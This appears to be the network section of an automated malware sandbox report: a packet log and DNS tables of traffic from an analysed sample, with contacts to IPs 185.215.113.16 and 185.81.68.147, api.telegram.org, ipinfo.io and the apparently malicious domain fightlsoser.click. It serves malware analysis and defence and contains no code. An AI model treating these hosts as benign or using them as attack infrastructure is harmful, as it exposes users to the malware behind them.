                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217489958 CET8049975185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217500925 CET8049975185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217511892 CET4997580192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217528105 CET4997580192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217541933 CET4997580192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308237076 CET8049976185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308260918 CET8049976185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308273077 CET8049976185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308317900 CET4997680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308408022 CET8049976185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308419943 CET8049976185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308432102 CET8049976185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308448076 CET8049976185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308453083 CET4997680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308468103 CET4997680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308594942 CET8049976185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308607101 CET8049976185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:15.249828100 CET192.168.2.101.1.1.10x9ea5Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.026840925 CET192.168.2.101.1.1.10x1137Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.176158905 CET192.168.2.101.1.1.10x2ad9Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:26.290509939 CET192.168.2.101.1.1.10x6d06Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:06.307976007 CET192.168.2.101.1.1.10x7eefStandard query (0)prod.classify-client.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:06.564547062 CET192.168.2.101.1.1.10xce69Standard query (0)prod.classify-client.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:06.946485043 CET192.168.2.101.1.1.10xea50Standard query (0)youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:06.947093010 CET192.168.2.101.1.1.10x398Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.182641029 CET192.168.2.101.1.1.10x7e15Standard query (0)youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.182837963 CET192.168.2.101.1.1.10x8145Standard query (0)prod.detectportal.prod.cloudops.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.333777905 CET192.168.2.101.1.1.10xec6bStandard query (0)youtube.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.334072113 CET192.168.2.101.1.1.10xcd28Standard query (0)prod.detectportal.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:25.449732065 CET192.168.2.101.1.1.10x7f0bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:25.449892044 CET192.168.2.101.1.1.10x17dcStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:41.747917891 CET192.168.2.101.1.1.10x81f3Standard query (0)prod.classify-client.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:42.340625048 CET192.168.2.101.1.1.10x549eStandard query (0)youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:42.719841957 CET192.168.2.101.1.1.10x18d8Standard query (0)youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.066488981 CET192.168.2.101.1.1.10x3248Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.220676899 CET192.168.2.101.1.1.10x61ccStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.220796108 CET192.168.2.101.1.1.10xe2dbStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:04.730098963 CET192.168.2.101.1.1.10x37a5Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:04.730297089 CET192.168.2.101.1.1.10x303dStandard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:08.693980932 CET192.168.2.101.1.1.10xfee7Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:08.694077969 CET192.168.2.101.1.1.10xf659Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.680331945 CET192.168.2.101.1.1.10x31a5Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.680331945 CET192.168.2.101.1.1.10x487bStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.680680037 CET192.168.2.101.1.1.10x5223Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.680680037 CET192.168.2.101.1.1.10xc036Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.743360043 CET192.168.2.101.1.1.10x6eb4Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.743566990 CET192.168.2.101.1.1.10x1b1dStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:14.227915049 CET192.168.2.101.1.1.10xb8f7Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:14.228207111 CET192.168.2.101.1.1.10xc78aStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:22.075401068 CET192.168.2.101.1.1.10xfb4fStandard query (0)prod.classify-client.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:22.917496920 CET192.168.2.101.1.1.10xca8fStandard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:26.851718903 CET192.168.2.101.1.1.10xa358Standard query (0)support.mozilla.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:26.874703884 CET192.168.2.101.1.1.10x809fStandard query (0)fightlsoser.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.036680937 CET192.168.2.101.1.1.10x28cdStandard query (0)us-west1.prod.sumo.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.100305080 CET192.168.2.101.1.1.10xd87dStandard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.100616932 CET192.168.2.101.1.1.10x2e18Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.130932093 CET192.168.2.101.1.1.10x809fStandard query (0)fightlsoser.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.286413908 CET192.168.2.101.1.1.10x20deStandard query (0)youtube-ui.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.287324905 CET192.168.2.101.1.1.10x9136Standard query (0)star-mini.c10r.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.294176102 CET192.168.2.101.1.1.10x28cdStandard query (0)us-west1.prod.sumo.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.679580927 CET192.168.2.101.1.1.10x26bStandard query (0)star-mini.c10r.facebook.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.679933071 CET192.168.2.101.1.1.10xdd57Standard query (0)us-west1.prod.sumo.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.680269003 CET192.168.2.101.1.1.10x52f6Standard query (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.009838104 CET192.168.2.101.1.1.10x49a4Standard query (0)www.wikipedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.010020018 CET192.168.2.101.1.1.10x903fStandard query (0)www.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.010159016 CET192.168.2.101.1.1.10x1edfStandard query (0)twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.209633112 CET192.168.2.101.1.1.10x256Standard query (0)reddit.map.fastly.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.339884043 CET192.168.2.101.1.1.10x1edfStandard query (0)twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.340166092 CET192.168.2.101.1.1.10x39bStandard query (0)dyna.wikimedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.393999100 CET192.168.2.101.1.1.10x9c15Standard query (0)twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.403423071 CET192.168.2.101.1.1.10xccf4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.403541088 CET192.168.2.101.1.1.10x526Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.490530968 CET192.168.2.101.1.1.10x4b41Standard query (0)reddit.map.fastly.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.563685894 CET192.168.2.101.1.1.10x1614Standard query (0)twitter.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.574942112 CET192.168.2.101.1.1.10x9545Standard query (0)dyna.wikimedia.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:41.886501074 CET192.168.2.101.1.1.10x1a0eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:41.886626005 CET192.168.2.101.1.1.10x7e78Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:43.794709921 CET192.168.2.101.1.1.10xfa1aStandard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:43.948913097 CET192.168.2.101.1.1.10xd708Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:44.163124084 CET192.168.2.101.1.1.10x4177Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:44.340660095 CET192.168.2.101.1.1.10xe522Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:50.643024921 CET192.168.2.101.1.1.10xb733Standard query (0)services.addons.mozilla.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:50.671153069 CET192.168.2.101.1.1.10x926Standard query (0)normandy.cdn.mozilla.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:50.820432901 CET192.168.2.101.1.1.10x9a61Standard query (0)normandy-cdn.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:50.914011002 CET192.168.2.101.1.1.10xb0b7Standard query (0)services.addons.mozilla.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:51.055341005 CET192.168.2.101.1.1.10xfbefStandard query (0)normandy-cdn.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:51.057015896 CET192.168.2.101.1.1.10x9f81Standard query (0)services.addons.mozilla.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:51.859457016 CET192.168.2.101.1.1.10x2816Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:56.873900890 CET192.168.2.101.1.1.10x656aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:56.874048948 CET192.168.2.101.1.1.10x9b6dStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:15.387427092 CET1.1.1.1192.168.2.100x9ea5No error (0)drive.google.com216.58.208.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.164927959 CET1.1.1.1192.168.2.100x1137No error (0)drive.usercontent.google.com172.217.17.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.313886881 CET1.1.1.1192.168.2.100x2ad9No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:26.431003094 CET1.1.1.1192.168.2.100x6d06No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:06.288402081 CET1.1.1.1192.168.2.100x3d53No error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:06.535810947 CET1.1.1.1192.168.2.100x7eefNo error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.083506107 CET1.1.1.1192.168.2.100xea50No error (0)youtube.com142.250.181.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.084182024 CET1.1.1.1192.168.2.100x398No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.084182024 CET1.1.1.1192.168.2.100x398No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.319448948 CET1.1.1.1192.168.2.100x7e15No error (0)youtube.com142.250.181.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.319999933 CET1.1.1.1192.168.2.100x8145No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.472101927 CET1.1.1.1192.168.2.100xec6bNo error (0)youtube.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.472845078 CET1.1.1.1192.168.2.100xcd28No error (0)prod.detectportal.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:25.587150097 CET1.1.1.1192.168.2.100x7f0bNo error (0)www.google.com142.250.181.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:25.587173939 CET1.1.1.1192.168.2.100x17dcNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:41.739701986 CET1.1.1.1192.168.2.100x67f6No error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:42.477869987 CET1.1.1.1192.168.2.100x549eNo error (0)youtube.com142.250.181.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:42.857392073 CET1.1.1.1192.168.2.100x18d8No error (0)youtube.com142.250.181.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.208827019 CET1.1.1.1192.168.2.100x3248No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.208827019 CET1.1.1.1192.168.2.100x3248No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.357681036 CET1.1.1.1192.168.2.100xe2dbNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.357765913 CET1.1.1.1192.168.2.100x61ccNo error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:04.867202997 CET1.1.1.1192.168.2.100x37a5No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:04.868273973 CET1.1.1.1192.168.2.100x303dNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:06.111891985 CET1.1.1.1192.168.2.100xc866No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:06.111891985 CET1.1.1.1192.168.2.100xc866No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:06.131076097 CET1.1.1.1192.168.2.100x8451No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:08.833389044 CET1.1.1.1192.168.2.100xf659No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:08.833610058 CET1.1.1.1192.168.2.100xfee7No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.817677021 CET1.1.1.1192.168.2.100xc036No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.817697048 CET1.1.1.1192.168.2.100x31a5No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.817697048 CET1.1.1.1192.168.2.100x31a5No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.817718029 CET1.1.1.1192.168.2.100x487bNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.817728043 CET1.1.1.1192.168.2.100x5223No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.817728043 CET1.1.1.1192.168.2.100x5223No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.880990028 CET1.1.1.1192.168.2.100x1b1dNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.881288052 CET1.1.1.1192.168.2.100x6eb4No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:09.881288052 CET1.1.1.1192.168.2.100x6eb4No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:14.365437984 CET1.1.1.1192.168.2.100xc78aNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:14.365674973 CET1.1.1.1192.168.2.100xb8f7No error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:23.056003094 CET1.1.1.1192.168.2.100xca8fNo error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:23.056003094 CET1.1.1.1192.168.2.100xca8fNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:26.990478992 CET1.1.1.1192.168.2.100xa358No error (0)support.mozilla.orgprod.sumo.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:26.990478992 CET1.1.1.1192.168.2.100xa358No error (0)prod.sumo.prod.webservices.mozgcp.netus-west1.prod.sumo.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:26.990478992 CET1.1.1.1192.168.2.100xa358No error (0)us-west1.prod.sumo.prod.webservices.mozgcp.net34.149.128.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.223392010 CET1.1.1.1192.168.2.100x809fNo error (0)fightlsoser.click172.67.213.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.223392010 CET1.1.1.1192.168.2.100x809fNo error (0)fightlsoser.click104.21.35.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.238122940 CET1.1.1.1192.168.2.100xd87dNo error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.238122940 CET1.1.1.1192.168.2.100xd87dNo error (0)youtube-ui.l.google.com172.217.19.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.238122940 CET1.1.1.1192.168.2.100xd87dNo error (0)youtube-ui.l.google.com142.250.181.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.238122940 CET1.1.1.1192.168.2.100xd87dNo error (0)youtube-ui.l.google.com142.250.181.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.238122940 CET1.1.1.1192.168.2.100xd87dNo error (0)youtube-ui.l.google.com142.250.181.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.238122940 CET1.1.1.1192.168.2.100xd87dNo error (0)youtube-ui.l.google.com216.58.208.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.238122940 CET1.1.1.1192.168.2.100xd87dNo error (0)youtube-ui.l.google.com142.250.181.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.238122940 CET1.1.1.1192.168.2.100xd87dNo error (0)youtube-ui.l.google.com172.217.17.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.238122940 CET1.1.1.1192.168.2.100xd87dNo error (0)youtube-ui.l.google.com142.250.181.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.238122940 CET1.1.1.1192.168.2.100xd87dNo error (0)youtube-ui.l.google.com172.217.17.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.238122940 CET1.1.1.1192.168.2.100xd87dNo error (0)youtube-ui.l.google.com172.217.19.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.238204002 CET1.1.1.1192.168.2.100x2e18No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.238204002 CET1.1.1.1192.168.2.100x2e18No error (0)star-mini.c10r.facebook.com157.240.196.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.268258095 CET1.1.1.1192.168.2.100x809fNo error (0)fightlsoser.click104.21.35.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.268258095 CET1.1.1.1192.168.2.100x809fNo error (0)fightlsoser.click172.67.213.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.373162985 CET1.1.1.1192.168.2.100x28cdNo error (0)us-west1.prod.sumo.prod.webservices.mozgcp.net34.149.128.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.424344063 CET1.1.1.1192.168.2.100x20deNo error (0)youtube-ui.l.google.com142.250.181.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.424344063 CET1.1.1.1192.168.2.100x20deNo error (0)youtube-ui.l.google.com142.250.181.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.424344063 CET1.1.1.1192.168.2.100x20deNo error (0)youtube-ui.l.google.com142.250.181.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.424344063 CET1.1.1.1192.168.2.100x20deNo error (0)youtube-ui.l.google.com172.217.19.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.424344063 CET1.1.1.1192.168.2.100x20deNo error (0)youtube-ui.l.google.com172.217.17.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.424344063 CET1.1.1.1192.168.2.100x20deNo error (0)youtube-ui.l.google.com216.58.208.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.424344063 CET1.1.1.1192.168.2.100x20deNo error (0)youtube-ui.l.google.com172.217.17.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.424344063 CET1.1.1.1192.168.2.100x20deNo error (0)youtube-ui.l.google.com142.250.181.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.424344063 CET1.1.1.1192.168.2.100x20deNo error (0)youtube-ui.l.google.com142.250.181.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.424344063 CET1.1.1.1192.168.2.100x20deNo error (0)youtube-ui.l.google.com172.217.19.238A (IP address)IN (0x0001)false
